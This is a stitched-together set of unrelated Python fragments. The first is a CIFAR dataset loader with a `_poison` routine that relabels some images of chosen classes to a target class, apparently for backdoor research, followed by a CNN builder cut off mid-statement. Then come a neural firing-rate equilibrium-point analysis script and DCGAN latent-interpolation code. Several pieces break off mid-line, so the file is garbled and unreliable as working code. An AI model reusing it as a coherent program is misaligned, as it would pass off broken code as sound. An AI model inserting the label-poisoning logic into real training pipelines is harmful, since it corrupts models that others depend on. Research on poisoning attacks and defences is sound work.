def num_examples_per_epoch(self, subset='train'):
return len(self.data[0])
def get_input_preprocessor(self, input_preprocessor='default'):
return CifarImagePreprocessor
def _trim_data_by_label(self, data_list, selected_labels):
sl_list = []
for k,d in enumerate(data_list[1]):
if int(d) in selected_labels:
sl_list.append(k)
ret=[]
for data in data_list:
ret_d = []
for k in sl_list:
ret_d.append(data[k])
ret.append(ret_d)
return tuple(ret)
def _read_data(self, options):
def unpickle(file):
import pickle
with open(file, 'rb') as fo:
dict = pickle.load(fo, encoding='bytes')
return dict
import os
if self.phase == 'train':
filenames = [
os.path.join(options.data_dir, 'data_batch_%d' % i)
for i in xrange(1, 6)
]
elif self.phase == 'validation':
filenames = [os.path.join(options.data_dir, 'test_batch')]
else:
raise ValueError('Invalid data phase "%s"' % self.phase)
lbs = []
ims = []
selected = options.selected_training_labels
max_lb = -1
print(filenames)
for d in filenames:
f_path = os.path.join(options.data_dir,d)
ret_dict = unpickle(f_path)
data = ret_dict[b'data']
labels = ret_dict[b'labels']
max_lb = -1
for lb, im in zip(labels,data):
max_lb = max(lb, max_lb)
#if selected is not None and lb not in selected:
# continue
lbs.append(lb)
ims.append(im)
self._num_classes = max_lb+1 # labels from 0
print('===data===')
print('need to read %d images from %d class in folder: %s' % (len(ims), len(set(lbs)), options.data_dir))
if selected is not None:
print('while after selection, there are total %d classes' % self._num_classes)
return (ims, lbs)
def _poison(self, data):
options = self.options
n_benign = 0
n_poison = 0
n_cover = 0
lps, lbs = data
rt_lps = []
rt_lbs = []
ori_lbs = []
po = []
n_p = len(self.options.poison_object_label)
assert(len(self.options.poison_subject_labels) >= n_p)
assert(len(self.options.poison_cover_labels) >= n_p)
for p,l in zip(lps,lbs):
#if (random.random() > 0.2):
# continue
if 'only' not in self.options.data_mode:
if (options.benign_limit is None) or (n_benign < options.benign_limit):
rt_lps.append(p)
rt_lbs.append(l)
ori_lbs.append(l)
po.append(-1)
n_benign += 1
for s,o,c,k in zip(options.poison_subject_labels, options.poison_object_label, options.poison_cover_labels, range(n_p)):
if l == o:
continue
j1 = s is None or l in s
j2 = c is None or l in c
if j1:
if random.random() < 1-options.poison_fraction:
continue
if (options.poison_limit is not None) and (n_poison >= options.poison_limit):
continue
rt_lps.append(p)
rt_lbs.append(o)
ori_lbs.append(l)
po.append(k)
n_poison += 1
elif j2:
if random.random() < 1-options.cover_fraction:
continue
if (options.cover_limit is not None) and (n_cover >= options.cover_limit):
continue
rt_lps.append(p)
rt_lbs.append(l)
ori_lbs.append(l)
po.append(k)
n_cover += 1
print('total %d images'%len(po))
print('poison %d images'%n_poison)
print('cover %d images'%n_cover)
self.n_poison = n_poison
self.n_cover = n_cover
#return (rt_lps,ori_lbs,po), ori_lbs
return (rt_lps,rt_lbs,po), ori_lbs
def build_base_model(x=None):
#image = tf.keras.layers.Input(shape=(32,32,3))
if x is None: x = tf.keras.layers.Input(shape=(32,32,3))
y = x
num_conv_layers = [2, 2, 2]
assert len(num_conv_layers) == 3
for _ in xrange(num_conv_layers[0]):
y = tf.keras.layers.Conv2D(filters=32,
kernel_size=3,
padding='same',
activation='relu')(y)
#cnn.conv(32, 3, 3)
y = tf.keras.layers.MaxPooling2D(pool_size=(2,2),
strides=(2,2),
padding='same')(y)
y = tf.keras.layers.Dropout(0.2)(y)
#cnn.mpool(2, 2)
##cnn.dropout(keep_prob=0.8)
for _ in xrange(num_conv_layers[1]):
y = tf.keras.layers.Conv2D(filters=64,
kernel_size=3,
padding='same',
activation='relu')(y)
#cnn.conv(64, 3, 3)
y = tf.keras.layers.MaxPooling2D(pool_size=(2,2),
strides=(2,2),
padding='same')(y)
y = tf.keras.layers.Dropout(0.2)(y)
#cnn.mpool(2, 2)
#cnn.dropout(keep_prob=0.8)
for _ in xrange(num_conv_layers[2]):
y = tf.keras.layers.Conv2D(filters=128,
kernel_size=3,
padding='same',
activation='relu')(y)
#cnn.conv(128, 3, 3)
y = tf.keras.layers.MaxPooling2D(pool_size=(2,2),
strides=(2,2),
padding='same')(y)
y = tf.keras.layers.Dropout(0.2)(y)
#cnn.mpool(2, 2)
#cnn.dropout(keep_prob=0.8)
y = tf.keras.layers.Flatten()(y)
  y =
# File: equilibrium_points/statistics_brief.py
import os
import warnings
import numpy as np
import random as rand
import matplotlib.pyplot as plt
import dynalysis.basics as bcs
import dynalysis.classes as clss
from itertools import combinations
from scipy.stats import pearsonr
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA, IncrementalPCA
from dynalysis.visualization import subplot
from sub_basics import *
combs=[p for p in combinations([0,1,2,3],1)]+[p for p in combinations([0,1,2,3],2)]+\
[p for p in combinations([0,1,2,3],3)]+[p for p in combinations([0,1,2,3],4)]
def warn(*args, **kwargs):
pass
warnings.warn = warn
def filter_data(l):
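    # The input is assumed to consist of one 100-sample block per entry of
    # `combs`; only samples 40-90 of each block are kept.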
count, res = 0, []
for comb in combs:
res += l[40+100*count:90+100*count]
count += 1
return res
def get_state_train(b, runnum, repeat=1):
'''
state_train is a list of coordinates.
returns: 1) list, a list of all coordinates.
2) list, a list containing sub-lists of coordinates, with each sub-list being a different trial.
3) list, a list containing sub-lists of firing rates for each neuron
'''
os.chdir(b.pathlink)
state_train_all, state_train_trucks, state_neurons = [], [], [[] for i in range(4)]
for rp in range(1,repeat+1):
#obtain firing rate trains
x = bcs.readcolumn(bcs.filename_generator('Frate.txt', rp), to_float=True)
x = [filter_data(x[i]) for i in range(1,len(x))]
#state train
state_train = list(zip(x[0],x[1],x[2],x[3])) #for 4 neurons only!
state_train_trucks.append(state_train)
state_train_all += state_train
for i in range(4): state_neurons[i] += x[i]
return state_train_all, state_train_trucks, state_neurons
def EP(state_train, nmax=4, plot=False):
'''
Performs the elbow test and returns relevant info about EP.
    returns: 1) int, number of EPs, 2) list, coordinates of the EPs,
    3) list, state_train labeled into clusters, 4) float, ratio of SSE
'''
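    # Elbow criterion used here: k-means is fit for k = 1..nmax and the
    # within-cluster SSE recorded for each k; an elbow at k clusters is declared
    # when the SSE drop from k-1 to k is much larger (factor 7, see
    # much_larger_than) than the drop from k to k+1, otherwise one cluster is
    # reported.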
all_sse, all_mean, all_labels = [], [], [] #SSE represents how well the data performs
for k in range(1,nmax+1):
SSE=0
labels = KMeans(n_clusters=k, max_iter=400, precompute_distances = 'auto').fit_predict(state_train)
all_labels.append(labels)
mean_train, temp = [[] for c in range(k)], []
for s in range(len(labels)):
mean_train[labels[s]].append(list(state_train[s]))
for i in range(k):
if mean_train[i]==[]: temp.append([0,0,0,0])
else: temp.append(list(np.mean(np.array(mean_train[i]), axis=0)))
all_mean.append(temp)
for j in range(k):
for ss in mean_train[j]:
SSE += vect_len(ss, all_mean[k-1][j])**2
all_sse.append(SSE)
diff = [all_sse[i]-all_sse[i+1] for i in range(nmax-1)]
ratios = []
for i in range(nmax-2):
if diff[i+1]!=0:ratios.append(diff[i]/float(diff[i+1]))
else: ratios.append(np.inf)
#plot
if plot:
plt.plot([i for i in range(1,nmax+1)], all_sse, 'k', alpha=0.5)
plt.scatter([i for i in range(1,nmax+1)], all_sse, s=20, c='b')
plt.xticks([i for i in range(1, nmax+1)])
plt.xlabel('k (number of clusters)', fontsize=14)
plt.ylabel('SSE (Hz squared)', fontsize=14)
plt.title('Ratios: '+', '.join(bcs.to_string(ratios)))
plt.savefig('elbow.png', dpi=100)
plt.close('all')
#determine if elbow exists
for d in range(nmax-2):
if much_larger_than(diff[d], diff[d+1], 7): return d+2, all_mean[d+1], all_labels[d+1], ratios[d]
return 1, all_mean[0], all_labels[0], 0
def pca(fit_train, trans_train, dim=2):
'''
Performs pca on fit_train, and transforms trans_train using the results.
returns: 1) list, new_trans_train, i.e. a list of coordinates, under pca transformation.
2) list, eigenvectors of the pca transformation.
'''
pca = IncrementalPCA(n_components=dim)
try:
pca.fit(fit_train)
except:
return [[0]*dim]*len(fit_train), 0
comp = pca.components_
new_trans_train = pca.transform(trans_train)
return new_trans_train, comp
def sort_clusters(nclusters, sorted_train, bin_size=0.01):
'''
returns: storage, which stores the attractors as garages
and len(time periods) that the system stays in said attractors items.
'''
#count transitions and store
STRG = storage([i for i in range(nclusters)], ['list' for i in range(nclusters)])
previous_n, previous_name=0, sorted_train[0]
for n in range(len(sorted_train)):
name = sorted_train[n]
if name != previous_name:
STRG.store_list(previous_name, (n-previous_n)*bin_size)
previous_name=name
previous_n=n
return STRG
def escape_rate(nclusters, STRG):
'''
    returns: dict, with attractors as keys and their escape rates as values
'''
escape_dic={}
for nc in range(nclusters):
try:
escape_dic[nc]=np.mean(STRG.retrieve_garage(nc))
except RuntimeWarning:
escape_dic[nc]=0
return escape_dic
def get_fano(state_neurons):
'''
returns: the fano factor averaged the trials for each neuron.
'''
res=[]
for neuron in state_neurons:
res.append(bcs.fano(neuron))
return res
def print_commands(plot, plot_fr, plot_pca, plot_elbow, trans, runnum, only):
print('CAUTION: combs must be adjusted manually.')
print('***Just to be clear, these are the commands for this run:')
print('The trial you are running is: run'+runnum)
print('Trans code is: '+trans+'\n')
if plot and plot_fr: print('The firing rate graph will be plotted.')
if plot and plot_pca: print('The pca graph will be plotted.')
if plot and plot_elbow: print('The elbow graph will be plotted.')
if not plot: print('Nothing will be plotted.')
print('These actions will be done: '+', '.join(only))
def confidence(FFlist, ratio, esc_rate, harsh_criteria=10):
deter1=lower_than(FFlist, harsh_criteria) #whether FF is VERY low
#deter2=lower_than([float(ratio)], 15) #whether ratio is <15
deter3=lower_than(bcs.to_float(esc_rate.split('_')),0.05) #whether all escape rate is < 0.05
if deter1 and deter3: return '90_FP'
elif deter1 and (not deter3): return '70_FP'
else: return '30_FP'
def continuity(lists):
res=[]
for l in lists:
previous_i, count, accumulate = 0, 1, []
for j in range(len(l)):
i=l[j]
if j==(len(l)-2):
accumulate.append(count)
elif i !=0: count+=1
elif previous_i!=0 and i==0:
accumulate.append(count)
count=1
previous_i=i
if accumulate==[]: res.append(0)
else: res.append(np.mean(accumulate))
return res
def correlation(lists):
res=[]
combs=combinations('0123',2)
for comb in combs:
A, B = lists[int(comb[0])], lists[int(comb[1])]
try:
corr, pval = pearsonr(A,B)
except RuntimeWarning:
corr, pval = 0, 0
to_append='_'.join([comb[0]+comb[1],str(corr),str(pval)])
res.append(to_append)
return res
def determine_corr(num, FFlist, comb):
FF1, FF2 = FFlist[int(comb[0])], FFlist[int(comb[1])]
if FF1==0 and FF2==0: return 'none'
elif num > 0.5: return 'pos'
elif num < -0.5: return 'neg'
elif FF1<5 and FF2<5 and num < 0.5: return 'pos'
elif FF1<5 and FF2<5 and num > -0.5: return 'neg'
else: return 'none'
def determine_states(runnum, motherpath=os.getcwd()):
b_res=clss.branch('results_'+str(runnum), motherpath)
corrlink=os.path.join(b_res.pathlink,'corr.txt')
infolink=os.path.join(b_res.pathlink,'info.txt')
info_entry, corr_entry=clss.entry([' 0', ' 0_6'], [' 1', ' 4']), clss.entry([' 0', ' 0_6'], [])
infodata = info_entry.readdata_and_fix(infolink)
corrdata = corr_entry.readdata_and_fix(corrlink, quick_format=True)
motdic = {} #{motif: [[numEP, (comb, relation),..],..]}
for key in corrdata.keys():
#arrange each ps into [numEP, (comb, relation),..]
numEP, motif, FF = infodata[key][0], key[1], bcs.to_float(infodata[key][1].split('_'))
if motif not in motdic.keys(): motdic[motif]=[]
temp = [numEP]
for val in corrdata[key]:
comb, crvalue, pvalue = val.split('_')
relation = determine_corr(float(crvalue), FF, comb)
temp.append((comb, relation))
#Try to catch errors in states:
relations = [combo[1] for combo in temp[1:]]
if relations.count('none')>=3: temp=[numEP,('01','none'),('02','none'),('03','none'),\
('12','none'),('13','none'),('23','none')]
if relations.count('pos')>=3: temp=[numEP,('01','pos'),('02','pos'),('03','pos'),\
('12','pos'),('13','pos'),('23','pos')]
#Determine if there is already a qualitatively similar parameter set in the motif
to_append = True
for pms in motdic[motif]: #[[numEP, (comb, relation),..],..]
exit = True
for item in temp: #[numEP, (comb, relation),..]
if item not in pms:
exit = False
break
if exit:
to_append = False
break
if to_append: motdic[motif].append(temp)
return motdic
#determine_states('3')
def main(runnum, plot=False, outfile='info.txt', trans='ffffssff', motherpath=os.getcwd(), remedy=False, **kwargs):
'''
1) Plots the elbow and the frate graphs, moves all of them to a folder called 'graphs'.
2) Performs kmeans on the data to get EP-relevant info, and:
    [1] Returns the pms along with their corresponding coordinates of the EPs in two dimensions (determined by pca).
[2] Plots the data of each param_set (PS) onto pca, labels the EPs, and moves it to folder 'graphs'.
[3] Outputs PS, #EP, EP_coor, ratio, FF to file outfile.
parameters:
*plot: If any graph is plotted at all, it must be set to True.
*only: Can select a few actions only.
'''
#kwargs
kw={'plot_fr':False, 'plot_pca':False, 'plot_elbow':False, 'corrfile':'corr.txt', 'only':[], 'EPfile':'EPcoor.txt'}
kw.update(kwargs)
plot_fr, plot_pca, plot_elbow = kw['plot_fr'], kw['plot_pca'], kw['plot_elbow']
corrfile, only, EPfile = kw['corrfile'], kw['only'], kw['EPfile']
print_commands(plot, plot_fr, plot_pca, plot_elbow, trans, runnum, only)
#dir
runpath=os.path.join(os.getcwd(),'run'+runnum)
os.chdir(runpath)
alldirs=[dr for dr in os.listdir(runpath) if os.path.isdir(os.path.join(runpath,dr))]
allpms=[]
#deters
deter_esc = (only==[] or ('esc' in only))
deter_pca = (only==[] or ('pca' in only))
deter_FF = (only==[] or ('FF' in only))
deter_pw = (only==[] or ('pw' in only))
deter_corr = (only==[] or ('corr' in only))
deter_info = (only==[] or ('info' in only))
deter_EP = (only==[] or ('EP' in only))
#result files and outputs
b_res=clss.branch('results_'+str(runnum), motherpath)
b_graphs=clss.branch('graphs',b_res.pathlink)
if os.path.exists(os.path.join(b_res.pathlink, outfile)):
done=bcs.readcolumn(os.path.join(b_res.pathlink, outfile))[0]
else:
done=[]
if plot: b_graphs.mkdir()
else: b_res.mkdir()
if deter_info and not remedy: bcs.output_clf(os.path.join(b_res.pathlink,outfile))
if deter_corr and not remedy: bcs.output_clf(os.path.join(b_res.pathlink,corrfile))
#analysis
count=0
for dr in alldirs:
if dr not in done:
count+=1
print(str(count)+':'+dr)
#specifications
pm=parameter([],[])
pm.assign_name(dr, trans_method=trans)
b=clss.branch(dr,runpath)
rp=10 if len(os.listdir(b.pathlink))>9 else 1 #due to flawed dataset
#get EPs
state_train_all, state_train_truck, state_neurons = get_state_train(b, runnum, repeat=rp)
nclusters, EP_coors, label_train, ratio = EP(state_train_all, nmax=5, plot=(plot and plot_elbow))
EP4 = ['_'.join(bcs.to_string(item)) for item in EP_coors]
#calculate escape rate
if deter_esc:
accumulation=0
STRG = storage([nc for nc in range(nclusters)], ['list' for i in range(nclusters)])
for state_train in state_train_truck:
lt=label_train[accumulation:len(state_train)+accumulation]
accumulation+=len(state_train)
new_STRG=sort_clusters(nclusters,lt)
for nc in range(nclusters): STRG.massive[nc]+=new_STRG.massive[nc]
ed = escape_rate(nclusters, STRG)
#pcaPS
if deter_pca:
trans_train, comp = pca(state_train_all, state_train_all+EP_coors)
x, y = [item[0] for item in trans_train], [item[1] for item in trans_train]
pm.add_pair(('EP',EP_coors))
allpms.append(pm)
if plot and plot_pca:
plt.plot(x[:-(nclusters)], y[:-(nclusters)], 'k.', alpha=0.5)
plt.plot(x[-(nclusters):], y[-(nclusters):], 'b.')
plt.xlabel('dim1', fontsize=14)
plt.ylabel('dim2', fontsize=14)
plt.savefig(dr+'_pcaPS.png', dpi=100)
plt.close('all')
#fano factor
if deter_FF:
FF=get_fano(state_neurons)
FFall='_'.join(bcs.to_string(FF))
#pulse width
if deter_pw:
pwidth=continuity(state_neurons)
pall='_'.join(bcs.to_string(pwidth))
#correlation
if deter_corr:
all_corrs=correlation(state_neurons)
#move graphs and outputs
if plot:
if plot_elbow: os.rename('elbow.png',dr+'_elbow.png')
if plot_fr: subplot(fname=os.path.join(b.pathlink, 'Frate.txt'), outputfigname=dr+'_frate.png', tstep=5,\
title='Fano Factors: '+FFall, tight=False, dpi=100)
if plot_elbow: b_graphs.move_from(dr+'_elbow.png',b.pathlink)
if plot_fr: b_graphs.move_from(dr+'_frate.png',b.pathlink)
if plot_pca: b_graphs.move_from(dr+'_pcaPS.png',b.pathlink)
if deter_info:
vals=[ed[key] for key in sorted(ed.keys())]
numEP, esc_rate, ratio= str(len(ed.keys())), '_'.join(bcs.to_string(vals)), str(ratio)
bcs.output_line(os.path.join(b_res.pathlink,outfile),\
' '.join([dr,numEP, esc_rate,ratio,FFall,pall]))
if deter_corr:
bcs.output_line(os.path.join(b_res.pathlink,corrfile),\
' '.join([dr]+all_corrs))
if deter_EP:
bcs.output_line(os.path.join(b_res.pathlink,EPfile),\
' '.join([dr]+EP4))
os.chdir(motherpath)
return allpms
def plot_pcaEPs(runnum, plot=False, motherpath=os.getcwd(), trans='fffsfss', feature='i'):
'''
    Plots the coordinates of the EPs in two dimensions (determined by pca).
'''
b_res=clss.branch('results_'+str(runnum),motherpath)
b_pcaEP=clss.branch('pcaEP',b_res.pathlink)
b_pcaEP.mkdir()
os.chdir(b_pcaEP.pathlink)
#reevaluation
newfile=os.path.join(b_res.pathlink, 'new-info.txt')
EPfile=os.path.join(b_res.pathlink, 'EPcoor.txt')
Ent=clss.entry(' 0', [' 6'])
Ent2=clss.entry(' 0', [])
data=Ent.readdata_and_fix(newfile)
EPcoorss=Ent2.readdata_and_fix(EPfile, quick_format=True)
#sort pms by motifs(ID)
IDdic, coldic={}, {}
for key in data.keys():
pm=parameter([], [])
pm.assign_name(key, trans_method='iiiiss')
motID, col=pm.extract('ID'), pm.extract(feature)
if motID not in IDdic.keys(): IDdic[motID]=[]
if motID not in coldic.keys(): coldic[motID]=[]
actual_coors=[bcs.to_float(cr.split('_')) for cr in EPcoorss[key]]
#reevaluation
if data[key][0]=='o':
IDdic[motID]+=actual_coors
coldic[motID]+=[int(col)]*len(actual_coors)
else:
IDdic[motID]+=[list(np.mean(actual_coors,axis=0))]
coldic[motID]+=[int(col)]
for motID in IDdic.keys():
print(motID)
EP_coors=IDdic[motID]
#pca
trans_train, vectors = pca(EP_coors, EP_coors)
vec_strs = [str(round(vec[0],2))+' '+str(round(vec[1],2)) for vec in vectors]
#elbow then pca
nclusters, new_EP_coors, label_train, ratio = EP(EP_coors, nmax=6, plot=False)
new_trans_train = pca(EP_coors, new_EP_coors)[0]
if plot:
plt.plot([item[0] for item in trans_train], [item[1] for item in trans_train], 'k.')
plt.plot([item[0] for item in new_trans_train], [item[1] for item in new_trans_train], 'b.')
plt.xlabel('dim1: '+vec_strs[0], fontsize=14)
plt.ylabel('dim2: '+vec_strs[1], fontsize=14)
plt.savefig('pcaEP_'+motID+'.png', dpi=200)
plt.close('all')
#try
from dynalysis.data_visualization import plot_continuous_colorbar
plot_continuous_colorbar([item[0] for item in trans_train], [item[1] for item in trans_train],\
coldic[motID], 'dim1: '+vec_strs[0], 'dim2: '+vec_strs[1], feature,\
svf='pcaEP_'+motID+'_'+feature+'.png')
bcs.output_clf('pcaEP_'+motID+'.txt')
bcs.output_double('pcaEP_'+motID+'.txt', EP_coors)
os.chdir(motherpath)
return 0
def evaluation_by_FF(runnum, infile='info.txt', FF_criteria=30, cp=False):
'''
Evaluates the number of clusters based off ratio, Fano Factor, correlation and ON/OFF.
parameters:
*data: a dictionary with motifID as key and [numEP, esc_rate, ratio, FF1, FF2, FF3, FF4] as values
'''
#dir
file=os.path.join(os.getcwd(),'results_'+runnum, infile)
ofile=os.path.join(os.getcwd(),'results_'+runnum, 're-'+infile)
nfile=os.path.join(os.getcwd(),'results_'+runnum, 'new-'+infile)
b_res_path=os.path.join(os.getcwd(),'results_'+runnum)
b_graphs=clss.branch('graphs', b_res_path)
if cp:
b_regraphs_s=clss.branch('re-graphs-s', b_res_path)
b_regraphs_n=clss.branch('re-graphs-n', b_res_path)
b_regraphs_s.mkdir()
b_regraphs_n.mkdir()
bcs.output_clf(ofile)
bcs.output_clf(nfile)
Ent=clss.entry(' 0', [' 1', ' 2', ' 3', ' 4_0', ' 4_1', ' 4_2', ' 4_3', ' 5_0', ' 5_1', ' 5_2', ' 5_3'])
data=Ent.readdata_and_fix(file)
#main
new_data={}
for key in data:
numEP, esc_rate, ratio, FF1, FF2, FF3, FF4, pw1, pw2, pw3, pw4 = data[key]
FFlist=bcs.to_float([FF1, FF2, FF3, FF4])
FFstring='_'.join([FF1, FF2, FF3, FF4])
pwlist=bcs.to_float([pw1, pw2, pw3, pw4])
pwstring='_'.join([pw1, pw2, pw3, pw4])
deter1=(int(numEP)>1) #can only have FPs if numEP>1 by definition
deter2=lower_than(FFlist, FF_criteria) #if FF is too low
deter3=lower_than(bcs.to_float(esc_rate.split('_')),0.1) #whether all escape rate is < 0.1
        deter4=lower_than(pwlist,5) #whether
# 16 # PARAM
stored_images = 0
num_queued_images = 0
base_json_path = base_dir
seedA = []
seedB = []
with open(base_json_path + '/' + interp_data[0][0] + ".json", 'r') as f:
seedA = json.load(f)
with open(base_json_path + '/' + interp_data[0][1] + ".json", 'r') as f:
seedB = json.load(f)
total_frame_num = 0
for i in range(len(interp_data)):
total_frame_num += interp_data[i][2]
curr_cut_idx = 0
rand_batch_z = rand_state.uniform(-1, 1, size=(2 , dcgan.z_dim))
z1 = np.asarray(seedA, dtype=np.float32)
z2 = np.asarray(seedB, dtype=np.float32)
while stored_images < total_frame_num:
batch_idx = 0
batch_seeds = np.zeros(shape=(config.batch_size, 100), dtype=np.float32)
while batch_idx < config.batch_size:
interp_idx = num_queued_images % steps_per_interp
steps_per_interp_mode = steps_per_interp
if mode_num == 2 or mode_num == 6: # And not last frame
steps_per_interp_mode = steps_per_interp + 1
ratio = np.linspace(0, 1, steps_per_interp_mode)[interp_idx]
ratio = np.float32(ratio)
print(" ratio: " + str(ratio))
if mode_num == 1 or mode_num == 2:
result_z = slerp(ratio, z1, z2)
elif mode_num == 6: # Mode 6
result_z = lerp(ratio, z1, z2)
elif mode_num == 7: # Mode 6
result_z = wrap_lerp(ratio, z1, z2, cut)
elif mode_num == 9:
result_z = exp_ease(ratio, z1, z2, cut)
elif mode_num == 10:
result_z = sinusoid_ease(ratio, z1, z2, cut)
elif mode_num == 11:
result_z = flicker_lerp(ratio, z1, z2, rand_state, cut)
elif mode_num == 12:
result_z = exp_ease_inout(ratio, z1, z2, cut)
elif mode_num == 13:
result_z = exp_ease_inout(ratio, z1, z2, cut)
result_z = step_flicker(result_z, rand_state, cut)
elif mode_num == 14:
result_z = slerp(ratio, z1, z2)
result_z = step_flicker(result_z, rand_state, cut)
else:
result_z = z1 # If here, then no mode num def. Error.
batch_seeds[batch_idx] = result_z
batch_idx += 1
num_queued_images += 1
if num_queued_images % steps_per_interp == 0:
# interp_frame_nums = [8, 16, 32, 8, 25, 36, 85, 7, 16, 10, 40, 10, 30, 20, 30, 34, 50, 25, 50, 100, 120, 250, 300, 512]
curr_cut_idx += 1
if curr_cut_idx >= len(interp_data):
continue
steps_per_interp = interp_data[curr_cut_idx][2]
num_queued_images = 0
# if is_rand_steps_per_interp:
# steps_per_interp = interp_frame_nums[random.randint(0, len(interp_frame_nums)-1)]
rand_batch_z = rand_state.uniform(-1, 1, size=(config.batch_size , dcgan.z_dim))
# Read new json to z1
with open(base_json_path + '/' + interp_data[curr_cut_idx][0] + ".json", 'r') as f:
seedA = json.load(f)
with open(base_json_path + '/' + interp_data[curr_cut_idx][1] + ".json", 'r') as f:
seedB = json.load(f)
z1 = np.asarray(seedA, dtype=np.float32)
z2 = np.asarray(seedB, dtype=np.float32)
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: batch_seeds})
# Naming
for i in range(config.batch_size):
json_file = config.gen_json.split("/")[-1]
json_file_name = json_file.split(".")[0]
save_name = '{}_{}_{}_{:05d}'.format(json_file_name, config.dataset, time_stamp , count)
count += 1
# TODO: Create timestampt dir
img_path = config.sample_dir + "/" + save_name + '.png'
scipy.misc.imsave(img_path, samples[i, :, :, :])
print(Fore.CYAN + "Continuous random interp image generated: " + img_path)
stored_images += 1
if stored_images >= total_frame_num:
return count
return count
def exp_ease(ratio, low, high, cut):
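    # Exponential easing between low and high with t = ratio in [0, 1]:
    #   ease-in : low + (high - low) * t**power
    #   ease-out: low - (high - low) * (|t - 1|**power - 1)
    # power and is_ease_in are read from the cut description.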
is_ease_in = cut["is_ease_in"]
power = cut["power"]
if is_ease_in:
result = (high-low) * np.power(ratio, power) + low
else:
result = -(high-low) * (np.float_power(abs(ratio-1), power) - 1) + low
return result
def exp_ease_inout(ratio, low, high, cut):
power = cut["power"]
t = ratio * 2.0
if t < 1.0:
result = ((high-low)/2.0) * np.power(t, power) + low
else:
result = -((high-low)/2.0) * (np.float_power(abs(t-2), power) - 2) + low
return result
def sinusoid_ease(ratio, low, high, cut):
is_ease_in = cut["is_ease_in"]
if is_ease_in:
return -(high-low) * np.cos(ratio * np.pi / 2.0) + (high-low) + low
else:
return (high-low) * np.sin(ratio * np.pi / 2.0) + low
def lerp(val, low, high):
return low + (high - low) * val
def flicker_lerp(val, low, high, rand_state, cut):
max_step = cut["max_step"]
rand_offset = (rand_state.rand(low.shape[0]) - np.float32(0.5)) * np.float32(2.0)
return low + (high - low) * val + rand_offset * max_step
def slerp(val, low, high):
"""Code from https://github.com/soumith/dcgan.torch/issues/14"""
# print("MEEE slepr low: " + str(low.shape) + ", high: " + str(high.shape))
omega = np.arccos(np.clip(np.dot(low/np.linalg.norm(low), high/np.linalg.norm(high)), -1, 1))
so = np.sin(omega)
print("omega: " + str(omega) + " so: " + str(so) + " val: " + str(val))
print("typeomega: " + str(type(omega)) + " typeso: " + str(type(so)) + " val type: " + str(type(val)))
if so == 0:
return (1.0-val) * low + val * high # L'Hopital's rule/LERP
result = np.sin((1.0-val)*omega) / so * low + np.sin(val*omega) / so * high
if val <= 0.0:
print(str(result - low))
return result
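# A minimal sketch (not part of the original script) comparing slerp and lerp on two
# random 100-dimensional latent vectors, mirroring how the generation loop above walks
# from z1 to z2 over a fixed number of frames.
def _demo_latent_interp(n_frames=8, z_dim=100, seed=0):
    import numpy as np
    rng = np.random.RandomState(seed)
    z1 = rng.uniform(-1, 1, size=z_dim).astype(np.float32)
    z2 = rng.uniform(-1, 1, size=z_dim).astype(np.float32)
    for ratio in np.linspace(0, 1, n_frames):
        z_spherical = slerp(np.float32(ratio), z1, z2)  # modes 1, 2 and 14
        z_linear = lerp(np.float32(ratio), z1, z2)      # mode 6
        print(ratio, np.linalg.norm(z_spherical - z_linear))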
def visualize(sess, dcgan, config, option):
image_frame_dim = int(math.ceil(config.batch_size**.5))
if option == 0:
z_sample = np.random.uniform(-0.5, 0.5, size=(config.batch_size, dcgan.z_dim))
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: z_sample})
save_images(samples, [image_frame_dim, image_frame_dim], './samples/test_%s.png' % strftime("%Y-%m-%d-%H-%M-%S", gmtime()))
elif option == 1:
values = np.arange(0, 1, 1./config.batch_size)
for idx in xrange(dcgan.z_dim):
print(" [*] %d" % idx)
z_sample = np.random.uniform(-1, 1, size=(config.batch_size , dcgan.z_dim))
for kdx, z in enumerate(z_sample):
z[idx] = values[kdx]
if config.dataset == "mnist":
y = np.random.choice(10, config.batch_size)
y_one_hot = np.zeros((config.batch_size, 10))
y_one_hot[np.arange(config.batch_size), y] = 1
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: z_sample, dcgan.y: y_one_hot})
else:
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: z_sample})
print("MEEE samples shape: " + str(samples.shape))
save_images(samples, [image_frame_dim, image_frame_dim], './samples/test_arange_%s.png' % (idx))
elif option == 2:
values = np.arange(0, 1, 1./config.batch_size)
for idx in [random.randint(0, dcgan.z_dim - 1) for _ in xrange(dcgan.z_dim)]:
print(" [*] %d" % idx)
z = np.random.uniform(-0.2, 0.2, size=(dcgan.z_dim))
z_sample = np.tile(z, (config.batch_size, 1))
#z_sample = np.zeros([config.batch_size, dcgan.z_dim])
for kdx, z in enumerate(z_sample):
z[idx] = values[kdx]
if config.dataset == "mnist":
y = np.random.choice(10, config.batch_size)
y_one_hot = np.zeros((config.batch_size, 10))
y_one_hot[np.arange(config.batch_size), y] = 1
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: z_sample, dcgan.y: y_one_hot})
else:
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: z_sample})
try:
make_gif(samples, './samples/test_gif_%s.gif' % (idx))
except:
save_images(samples, [image_frame_dim, image_frame_dim], './samples/test_%s.png' % strftime("%Y-%m-%d-%H-%M-%S", gmtime()))
elif option == 3:
values = np.arange(0, 1, 1./config.batch_size)
for idx in xrange(dcgan.z_dim):
print(" [*] %d" % idx)
z_sample = np.zeros([config.batch_size, dcgan.z_dim])
for kdx, z in enumerate(z_sample):
z[idx] = values[kdx]
samples = sess.run(dcgan.sampler, feed_dict={dcgan.z: z_sample})
make_gif(samples, './samples/test_gif_%s.gif' % (idx))
elif option == 4:
image_set = []
values = np.arange(0, 1, 1./config.batch_size)
for idx in xrange(dcgan.z_dim):
print(" [*] %d" % idx)
z_sample = np.zeros([config.batch_size, dcgan.z_dim])
for kdx, z in enumerate(z_sample): z[idx] = values[kdx]
image_set.append(sess.run(dcgan.sampler, feed_dict={dcgan.z: z_sample}))
make_gif(image_set[-1], './samples/test_gif_%s.gif' % (idx))
new_image_set = [merge(np.array([images[idx] for images in image_set]), [10, 10]) \
for idx in range(64) + range(63, -1, -1)]
make_gif(new_image_set, './samples/test_gif_merged.gif', duration=8)
def generate_flicker(sess, dcgan, rand_state, config, base_dir, time_stamp, cut, count):
# params = cut["params"]
stored_images = 0
num_queued_images = 0
start_image_json = cut["start_image"]
total_frame_num = cut["total_frame_num"]
# base_json_path = cut["base_dir"]
mode_num = cut["mode_num"]
